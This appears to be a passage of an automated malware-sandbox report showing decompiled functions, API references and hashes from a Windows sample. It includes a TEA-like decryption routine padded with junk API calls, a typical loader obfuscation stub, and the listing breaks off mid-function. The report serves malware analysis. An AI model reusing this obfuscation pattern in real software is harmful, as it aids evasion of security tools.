                          0x0041172a
                          0x00411734
                          0x00411739
                          0x0041173e
                          0x00411748
                          0x00411752
                          0x00411757
                          0x0041175d
                          0x00411762
                          0x0041176e
                          0x00411773
                          0x00411775
                          0x0041177d
                          0x00411788
                          0x00411795
                          0x00411797
                          0x00411799
                          0x0041179e
                          0x004117b2

                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 00411768
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041177D
                          • UnhandledExceptionFilter.KERNEL32(00403668), ref: 00411788
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004117A4
                          • TerminateProcess.KERNEL32(00000000), ref: 004117AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 61c03205ef8c3e6e7e63563bb4364619f4ce14220ce7bd949dbf76a15cc36527
                          • Instruction ID: 20be6c9399a4ce716897345fc28426f95aa05d4a3b3114d1affec13d3545586c
                          • Opcode Fuzzy Hash: 61c03205ef8c3e6e7e63563bb4364619f4ce14220ce7bd949dbf76a15cc36527
                          • Instruction Fuzzy Hash: AE21F5B89402409FD700DF25E945B447BB4FB0AB02F10803AE549A7A72E7B46A84CF4D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040C824() {
                          
                          				SetUnhandledExceptionFilter(E0040C7E2);
                          				return 0;
                          			}



                          0x0040c829
                          0x0040c831

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000C7E2), ref: 0040C829
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
                          • Instruction ID: e2a8f789a288a585d98f9b92902466bf4f7c4288f4264d283a5847212c576c19
                          • Opcode Fuzzy Hash: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
                          • Instruction Fuzzy Hash: 5F900271291142C6C60417715E4A64665985A5C70276145796541E5CA5EB7450406919
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.248746882.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_file.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                          • Instruction ID: c21c9ab52cf2b744e11466062db4bfb90742f85da95ff8c3b1457c53a7e00997
                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                          • Instruction Fuzzy Hash: DE117072340500AFD754DE66DCD1FA673EAFB89320B298555ED08CB312D6B5EC41CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E00404D37() {
                          				void* _v6;
                          				struct _COORD _v8;
                          				unsigned int _v12;
                          				long _v16;
                          				long _v20;
                          				int _v24;
                          				short _v2072;
                          				char _v4120;
                          				unsigned int _t15;
                          				void* _t16;
                          				intOrPtr _t32;
                          				intOrPtr _t34;
                          
                          				E0040E260(0x1014);
                          				_t34 =  *0x444e90;
                          				_t15 =  *0x4450c4 >> 3;
                          				if(_t15 > 0) {
                          					_t32 = _t34;
                          					_v12 = _t15;
                          					do {
                          						if( *0x4450c4 == 0x959) {
                          							GetProcessWorkingSetSize(0, 0, 0);
                          							_v8 = 0;
                          							asm("stosw");
                          							FillConsoleOutputCharacterA(0, 0, 0, _v8,  &_v24);
                          							WriteConsoleW(0, 0, 0,  &_v16, 0);
                          							LCMapStringW(0, 0, 0, 0,  &_v2072, 0);
                          							LoadLibraryW(L"rijaxosetosezurinurikudeg");
                          							LoadLibraryA(0);
                          							WriteConsoleA(0, 0, 0,  &_v20, 0);
                          							__imp__GetConsoleAliasesW( &_v4120, 0, 0);
                          							GetFileInformationByHandle(0, 0);
                          						}
                          						_t16 = E00404BB7(0, _t32);
                          						_t32 = _t32 + 8;
                          						_t10 =  &_v12;
                          						 *_t10 = _v12 - 1;
                          					} while ( *_t10 != 0);
                          					return _t16;
                          				}
                          				return _t15;
                          			}















                          0x00404d3f
                          0x00404d49
                          0x00404d50
                          0x00404d57
                          0x00404d5f
                          0x00404d61
                          0x00404d64
                          0x00404d6e
                          0x00404d73
                          0x00404d7b
                          0x00404d82
                          0x00404d8e
                          0x00404d9c
                          0x00404dae
                          0x00404db9
                          0x00404dc0
                          0x00404dce
                          0x00404ddd
                          0x00404de5
                          0x00404de5
                          0x00404dec
                          0x00404df1
                          0x00404df4
                          0x00404df4
                          0x00404df4
                          0x00000000
                          0x00404dfe
                          0x00404e01

                          APIs
                          • GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00404D73
                          • FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00404D8E
                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D9C
                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00404DAE
                          • LoadLibraryW.KERNEL32(rijaxosetosezurinurikudeg), ref: 00404DB9
                          • LoadLibraryA.KERNEL32(00000000), ref: 00404DC0
                          • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404DCE
                          • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00404DDD
                          • GetFileInformationByHandle.KERNEL32(00000000,00000000), ref: 00404DE5
                          Strings
                          • rijaxosetosezurinurikudeg, xrefs: 00404DB4
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: Console$LibraryLoadWrite$AliasesCharacterFileFillHandleInformationOutputProcessSizeStringWorking
                          • String ID: rijaxosetosezurinurikudeg
                          • API String ID: 2068669440-2185336016
                          • Opcode ID: 36c68f3142dffd2b610d81bd14dacbe93bdd748033fa54ede573d448f525ec73
                          • Instruction ID: 1f82251b02b50db16ec5b467398f36478f02987073327340ac35c57c824ac964
                          • Opcode Fuzzy Hash: 36c68f3142dffd2b610d81bd14dacbe93bdd748033fa54ede573d448f525ec73
                          • Instruction Fuzzy Hash: FB11FC76802568BBD7219BA1EE48CEF7F7CFF8A351B000066F649E2160C6385641CBF9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E0040B5C9(signed int __edx, char _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t59;
                          				intOrPtr* _t61;
                          				signed int _t63;
                          				void* _t68;
                          				signed int _t69;
                          				signed int _t72;
                          				signed int _t74;
                          				signed int _t75;
                          				signed int _t77;
                          				signed int _t78;
                          				signed int _t81;
                          				signed int _t82;
                          				signed int _t84;
                          				signed int _t88;
                          				signed int _t97;
                          				signed int _t98;
                          				signed int _t99;
                          				intOrPtr* _t100;
                          				void* _t101;
                          
                          				_t90 = __edx;
                          				if(_a8 == 0 || _a12 == 0) {
                          					L4:
                          					return 0;
                          				} else {
                          					_t100 = _a16;
                          					if(_t100 != 0) {
                          						_t4 =  &_a4; // 0x405f77
                          						_t82 =  *_t4;
                          						__eflags = _t82;
                          						if(_t82 == 0) {
                          							goto L3;
                          						}
                          						_t63 = _t59 | 0xffffffff;
                          						_t90 = _t63 % _a8;
                          						__eflags = _a12 - _t63 / _a8;
                          						if(_a12 > _t63 / _a8) {
                          							goto L3;
                          						}
                          						_t97 = _a8 * _a12;
                          						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                          						_v8 = _t82;
                          						_v16 = _t97;
                          						_t81 = _t97;
                          						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                          							_v12 = 0x1000;
                          						} else {
                          							_v12 =  *(_t100 + 0x18);
                          						}
                          						__eflags = _t97;
                          						if(_t97 == 0) {
                          							L32:
                          							return _a12;
                          						} else {
                          							do {
                          								_t84 =  *(_t100 + 0xc) & 0x00000108;
                          								__eflags = _t84;
                          								if(_t84 == 0) {
                          									L18:
                          									__eflags = _t81 - _v12;
                          									if(_t81 < _v12) {
                          										_t68 = E0040B465(_t90, _t97,  *_v8, _t100);
                          										__eflags = _t68 - 0xffffffff;
                          										if(_t68 == 0xffffffff) {
                          											L34:
                          											_t69 = _t97;
                          											L35:
                          											return (_t69 - _t81) / _a8;
                          										}
                          										_v8 = _v8 + 1;
                          										_t72 =  *(_t100 + 0x18);
                          										_t81 = _t81 - 1;
                          										_v12 = _t72;
                          										__eflags = _t72;
                          										if(_t72 <= 0) {
                          											_v12 = 1;
                          										}
                          										goto L31;
                          									}
                          									__eflags = _t84;
                          									if(_t84 == 0) {
                          										L21:
                          										__eflags = _v12;
                          										_t98 = _t81;
                          										if(_v12 != 0) {
                          											_t75 = _t81;
                          											_t90 = _t75 % _v12;
                          											_t98 = _t98 - _t75 % _v12;
                          											__eflags = _t98;
                          										}
                          										_push(_t98);
                          										_push(_v8);
                          										_push(E00408D86(_t100));
                          										_t74 = E00408CAA(_t81, _t90, _t98, _t100, __eflags);
                          										_t101 = _t101 + 0xc;
                          										__eflags = _t74 - 0xffffffff;
                          										if(_t74 == 0xffffffff) {
                          											L36:
                          											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                          											_t69 = _v16;
                          											goto L35;
                          										} else {
                          											_t88 = _t98;
                          											__eflags = _t74 - _t98;
                          											if(_t74 <= _t98) {
                          												_t88 = _t74;
                          											}
                          											_v8 = _v8 + _t88;
                          											_t81 = _t81 - _t88;
                          											__eflags = _t74 - _t98;
                          											if(_t74 < _t98) {
                          												goto L36;
                          											} else {
                          												L27:
                          												_t97 = _v16;
                          												goto L31;
                          											}
                          										}
                          									}
                          									_t77 = E00406324(_t100);
                          									__eflags = _t77;
                          									if(_t77 != 0) {
                          										goto L34;
                          									}
                          									goto L21;
                          								}
                          								_t78 =  *(_t100 + 4);
                          								__eflags = _t78;
                          								if(__eflags == 0) {
                          									goto L18;
                          								}
                          								if(__eflags < 0) {
                          									_t48 = _t100 + 0xc;
                          									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                          									__eflags =  *_t48;
                          									goto L34;
                          								}
                          								_t99 = _t81;
                          								__eflags = _t81 - _t78;
                          								if(_t81 >= _t78) {
                          									_t99 = _t78;
                          								}
                          								E0040B100(_t81, _t99, _t100,  *_t100, _v8, _t99);
                          								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                          								 *_t100 =  *_t100 + _t99;
                          								_t101 = _t101 + 0xc;
                          								_t81 = _t81 - _t99;
                          								_v8 = _v8 + _t99;
                          								goto L27;
                          								L31:
                          								__eflags = _t81;
                          							} while (_t81 != 0);
                          							goto L32;
                          						}
                          					}
                          					L3:
                          					_t61 = E0040747B();
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					_push(0);
                          					 *_t61 = 0x16;
                          					E00409867(_t90, 0, _t100);
                          					goto L4;
                          				}
                          			}





























                          0x0040b5c9
                          0x0040b5d9
                          0x0040b5ff
                          0x00000000
                          0x0040b5e0
                          0x0040b5e0
                          0x0040b5e5
                          0x0040b606
                          0x0040b606
                          0x0040b609
                          0x0040b60b
                          0x00000000
                          0x00000000
                          0x0040b60d
                          0x0040b612
                          0x0040b615
                          0x0040b618
                          0x00000000
                          0x00000000
                          0x0040b61d
                          0x0040b621
                          0x0040b628
                          0x0040b62b
                          0x0040b62e
                          0x0040b630
                          0x0040b63a
                          0x0040b632
                          0x0040b635
                          0x0040b635
                          0x0040b641
                          0x0040b643
                          0x0040b708
                          0x00000000
                          0x0040b649
                          0x0040b649
                          0x0040b64c
                          0x0040b64c
                          0x0040b652
                          0x0040b683
                          0x0040b683
                          0x0040b686
                          0x0040b6df
                          0x0040b6e6
                          0x0040b6e9
                          0x0040b714
                          0x0040b714
                          0x0040b716
                          0x00000000
                          0x0040b71a
                          0x0040b6eb
                          0x0040b6ee
                          0x0040b6f1
                          0x0040b6f2
                          0x0040b6f5
                          0x0040b6f7
                          0x0040b6f9
                          0x0040b6f9
                          0x00000000
                          0x0040b6f7
                          0x0040b688
                          0x0040b68a
                          0x0040b697
                          0x0040b697
                          0x0040b69b
                          0x0040b69d
                          0x0040b6a1
                          0x0040b6a3
                          0x0040b6a6
                          0x0040b6a6
                          0x0040b6a6
                          0x0040b6a8
                          0x0040b6a9
                          0x0040b6b3
                          0x0040b6b4
                          0x0040b6b9
                          0x0040b6bc
                          0x0040b6bf
                          0x0040b722
                          0x0040b722
                          0x0040b726
                          0x00000000
                          0x0040b6c1
                          0x0040b6c1
                          0x0040b6c3
                          0x0040b6c5
                          0x0040b6c7
                          0x0040b6c7
                          0x0040b6c9
                          0x0040b6cc
                          0x0040b6ce
                          0x0040b6d0
                          0x00000000
                          0x0040b6d2
                          0x0040b6d2
                          0x0040b6d2
                          0x00000000
                          0x0040b6d2
                          0x0040b6d0
                          0x0040b6bf
                          0x0040b68d
                          0x0040b693
                          0x0040b695
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040b695
                          0x0040b654
                          0x0040b657
                          0x0040b659
                          0x00000000
                          0x00000000
                          0x0040b65b
                          0x0040b710
                          0x0040b710
                          0x0040b710
                          0x00000000
                          0x0040b710
                          0x0040b661
                          0x0040b663
                          0x0040b665
                          0x0040b667
                          0x0040b667
                          0x0040b66f
                          0x0040b674
                          0x0040b677
                          0x0040b679
                          0x0040b67c
                          0x0040b67e
                          0x00000000
                          0x0040b700
                          0x0040b700
                          0x0040b700
                          0x00000000
                          0x0040b649
                          0x0040b643
                          0x0040b5e7
                          0x0040b5e7
                          0x0040b5ec
                          0x0040b5ed
                          0x0040b5ee
                          0x0040b5ef
                          0x0040b5f0
                          0x0040b5f1
                          0x0040b5f7
                          0x00000000
                          0x0040b5fc

                          APIs
                          • __flush.LIBCMT ref: 0040B68D
                          • __fileno.LIBCMT ref: 0040B6AD
                          • __locking.LIBCMT ref: 0040B6B4
                          • __flsbuf.LIBCMT ref: 0040B6DF
                            • Part of subcall function 0040747B: __getptd_noexit.LIBCMT ref: 0040747B
                            • Part of subcall function 00409867: __decode_pointer.LIBCMT ref: 00409872
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                          • String ID: w_@$w_@
                          • API String ID: 3240763771-614044935
                          • Opcode ID: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
                          • Instruction ID: 5f5606b89cac3dbd6312031acd89d28b1066f652792005636562e4df81556f48
                          • Opcode Fuzzy Hash: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
                          • Instruction Fuzzy Hash: 57419331A006049BDB249F6AC84455FB7B6EF80324F24893BE455B72C0D779DD518B9D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E00404BB7(void* __eflags, unsigned int* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				char _v16;
                          				unsigned int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				char _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				intOrPtr _v52;
                          				intOrPtr _v56;
                          				intOrPtr* _t68;
                          				intOrPtr _t69;
                          				intOrPtr _t70;
                          				intOrPtr _t73;
                          				intOrPtr _t74;
                          				intOrPtr _t78;
                          				unsigned int* _t99;
                          				signed int _t104;
                          				unsigned int _t111;
                          
                          				_t68 = _a4;
                          				_t111 =  *(_t68 + 4);
                          				_t69 =  *0x419478; // 0x5e13b97e
                          				_v48 = _t69;
                          				_t70 =  *0x41947c; // 0xdc48e54b
                          				_v52 = _t70;
                          				_v20 =  *_t68;
                          				_v16 = 0;
                          				_v56 = 0x9e3779b9;
                          				E00404BAD( &_v16);
                          				_v16 = _v16 + 0x23f;
                          				if( *0x4450c4 == 0x14) {
                          					BackupEventLogW(0, 0);
                          				}
                          				_t73 =  *0x419480; // 0x6a6347b4
                          				_v40 = _t73;
                          				_t74 =  *0x419484; // 0xd03480f9
                          				_v44 = _t74;
                          				_v36 = 0x20;
                          				_t104 = 2;
                          				do {
                          					_v28 = _t104;
                          					_v28 = _v28 + 3;
                          					_v8 = (_v20 << 4) + _v40;
                          					_t78 =  *0x4450c4;
                          					if(_t78 == 0xfa9) {
                          						 *0x444f24 = 0xedeb2e40;
                          					}
                          					if(_t78 == 0x3eb) {
                          						 *0x444e8c = 0;
                          					}
                          					_v24 = _v20;
                          					_v24 = _v24 + _v16;
                          					_v12 = _v20 >> 5;
                          					 *0x444f20 = 0xf4ea3dee;
                          					E00404BB4( &_v12, _v44);
                          					_v8 = _v8 ^ _v24;
                          					if( *0x4450c4 == 0x9e6) {
                          						GetLastError();
                          					}
                          					_v12 = _v12 ^ _v8;
                          					if( *0x4450c4 == 0x213) {
                          						WaitNamedPipeW(0, 0);
                          						__imp__AssignProcessToJobObject(0, 0);
                          						GetFullPathNameW(0, 0, 0, 0);
                          					}
                          					_t111 = _t111 - _v12;
                          					_v32 = _t104;
                          					_v32 = _v32 - 0x5396dd36;
                          					_v32 = _v32 + 0x5396dd38;
                          					_v8 = (_t111 << _v32) + _v48;
                          					_v24 = _v16 + _t111;
                          					_v12 = _t111 >> _v28;
                          					_v12 = _v12 + _v52;
                          					_v8 = _v8 ^ _v24;
                          					_v8 = _v8 ^ _v12;
                          					 *0x443e2c = 0;
                          					_v20 = _v20 - _v8;
                          					_v16 = _v16 - _v56;
                          					_t63 =  &_v36;
                          					 *_t63 = _v36 - 1;
                          				} while ( *_t63 != 0);
                          				_t99 = _a4;
                          				_t99[1] = _t111;
                          				 *_t99 = _v20;
                          				return _t99;
                          			}

























                          0x00404bbd
                          0x00404bc4
                          0x00404bc7
                          0x00404bcc
                          0x00404bcf
                          0x00404bd7
                          0x00404bdd
                          0x00404be0
                          0x00404be3
                          0x00404bea
                          0x00404bef
                          0x00404bfd
                          0x00404c01
                          0x00404c01
                          0x00404c07
                          0x00404c0c
                          0x00404c0f
                          0x00404c16
                          0x00404c19
                          0x00404c20
                          0x00404c21
                          0x00404c21
                          0x00404c24
                          0x00404c31
                          0x00404c34
                          0x00404c3e
                          0x00404c40
                          0x00404c40
                          0x00404c4f
                          0x00404c51
                          0x00404c51
                          0x00404c5a
                          0x00404c60
                          0x00404c69
                          0x00404c72
                          0x00404c7c
                          0x00404c84
                          0x00404c91
                          0x00404c93
                          0x00404c93
                          0x00404c9c
                          0x00404ca9
                          0x00404cad
                          0x00404cb5
                          0x00404cbf
                          0x00404cbf
                          0x00404cc5
                          0x00404cc8
                          0x00404ccb
                          0x00404cd2
                          0x00404ce6
                          0x00404cee
                          0x00404cf5
                          0x00404cfb
                          0x00404d01
                          0x00404d07
                          0x00404d0a
                          0x00404d13
                          0x00404d19
                          0x00404d1c
                          0x00404d1c
                          0x00404d1c
                          0x00404d25
                          0x00404d2c
                          0x00404d30
                          0x00404d34

                          APIs
                          • BackupEventLogW.ADVAPI32(00000000,00000000), ref: 00404C01
                          • GetLastError.KERNEL32 ref: 00404C93
                          • WaitNamedPipeW.KERNEL32(00000000,00000000), ref: 00404CAD
                          • AssignProcessToJobObject.KERNEL32 ref: 00404CB5
                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404CBF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: AssignBackupErrorEventFullLastNameNamedObjectPathPipeProcessWait
                          • String ID:
                          • API String ID: 2469782577-3916222277
                          • Opcode ID: d84db55146c36003a7f7393f08569428c37f702ff9f7cd9bc2151b1b5ee15ded
                          • Instruction ID: 7e24f3741826b6654a9f02b7982a749862b9fc0ced947816e583d1fe04c9a157
                          • Opcode Fuzzy Hash: d84db55146c36003a7f7393f08569428c37f702ff9f7cd9bc2151b1b5ee15ded
                          • Instruction Fuzzy Hash: 4951B2B5D01218EFDB00DFA9D984AAEBBF4FB99310F10806AE515F7250D374AA41CF59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E00416028(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _t48;
                          				void* _t53;
                          				intOrPtr _t57;
                          				void* _t58;
                          				void* _t61;
                          
                          				_t61 = __eflags;
                          				_push(0x2c);
                          				_push(0x4172f0);
                          				E00408168(__ebx, __edi, __esi);
                          				_t48 = __ecx;
                          				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                          				_t57 =  *((intOrPtr*)(_t58 + 8));
                          				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                          				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                          				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                          				 *((intOrPtr*)(_t58 - 0x28)) = E00415BC3(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                          				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040BD70(__ecx, _t53, _t61) + 0x88));
                          				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c));
                          				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x88)) = _t57;
                          				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                          				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                          				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                          				 *(_t58 - 4) = 1;
                          				 *((intOrPtr*)(_t58 - 0x1c)) = E00415C68(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                          				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                          				 *(_t58 - 4) = 0xfffffffe;
                          				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                          				E0041614E(_t48, _t53, _t55, _t57, _t61);
                          				return E004081AD( *((intOrPtr*)(_t58 - 0x1c)));
                          			}








                          0x00416028
                          0x00416028
                          0x0041602a
                          0x0041602f
                          0x00416034
                          0x00416036
                          0x00416039
                          0x0041603c
                          0x0041603f
                          0x00416046
                          0x00416057
                          0x00416065
                          0x00416073
                          0x0041607b
                          0x00416089
                          0x0041608f
                          0x00416096
                          0x00416099
                          0x004160af
                          0x004160b2
                          0x00416127
                          0x0041612e
                          0x00416135
                          0x00416142

                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 00416050
                            • Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BD1
                            • Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BDF
                          • __getptd.LIBCMT ref: 0041605A
                            • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                            • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                          • __getptd.LIBCMT ref: 00416068
                          • __getptd.LIBCMT ref: 00416076
                          • __getptd.LIBCMT ref: 00416081
                          • _CallCatchBlock2.LIBCMT ref: 004160A7
                            • Part of subcall function 00415C68: __CallSettingFrame@12.LIBCMT ref: 00415CB4
                            • Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041615D
                            • Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041616B
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          • Opcode ID: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
                          • Instruction ID: 0daa8b67c47c473bc710cfcf4bfcec87d77ca9b3cc66d9d98589ed68b50df625
                          • Opcode Fuzzy Hash: 4b2ab6df44a4890b6c780c4c42d9139b8766dfd5e5185ba154c89391fd6b34d0
                          • Instruction Fuzzy Hash: A311C9B1C00209DFDB00EFA5D945AEEBBB0FF04314F10806EF854A7291DB389A519B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 26%
                          			E004163D5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                          				void* __ebp;
